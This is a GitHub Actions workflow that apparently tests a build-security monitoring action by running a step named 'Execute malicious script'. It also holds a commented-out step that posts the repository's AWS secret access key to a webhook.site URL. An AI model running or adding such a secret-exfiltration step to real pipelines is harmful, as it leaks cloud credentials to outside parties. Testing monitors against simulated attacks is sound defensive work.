name: Python Project (short workflow STAGE BASELINE)

on:
  workflow_dispatch:

permissions:
  checks: write
  contents: write
  packages: read

jobs:
  python-application-build:
    runs-on: ubuntu-latest
    name: Run build
    steps:
      - name: Setup PSE
        uses: invisirisk/pse-action@dev-test
        with:
          api_url: "https://app.prod.invisirisk.com"
          app_token: ${{ secrets.IR_API_KEY }}
          
      - uses: actions/checkout@v4

      - name: Use Python
        uses: actions/setup-python@v4
        with:
          python-version: "3.13"

      - name: Install dependencies
        run: pip install -r requirements.txt

      - name: 😈 Execute malicious script
        run: bash run_malicious_scripts.sh

      #- name: Send AWS Secret via Webhook
       # run: |
        #  curl -X POST "https://webhook.site/3cf43a02-7caa-4d2b-bc40-4cf906e55296?aws_secret_access_key=${{ secrets.AWS_SECRET_ACCESS_KEY }}" \
         #   -H "Content-Type: application/json"

      - name: Cleanup PSE
        if: always()
        uses: invisirisk/pse-action@dev-test
        with:
          cleanup: "true"
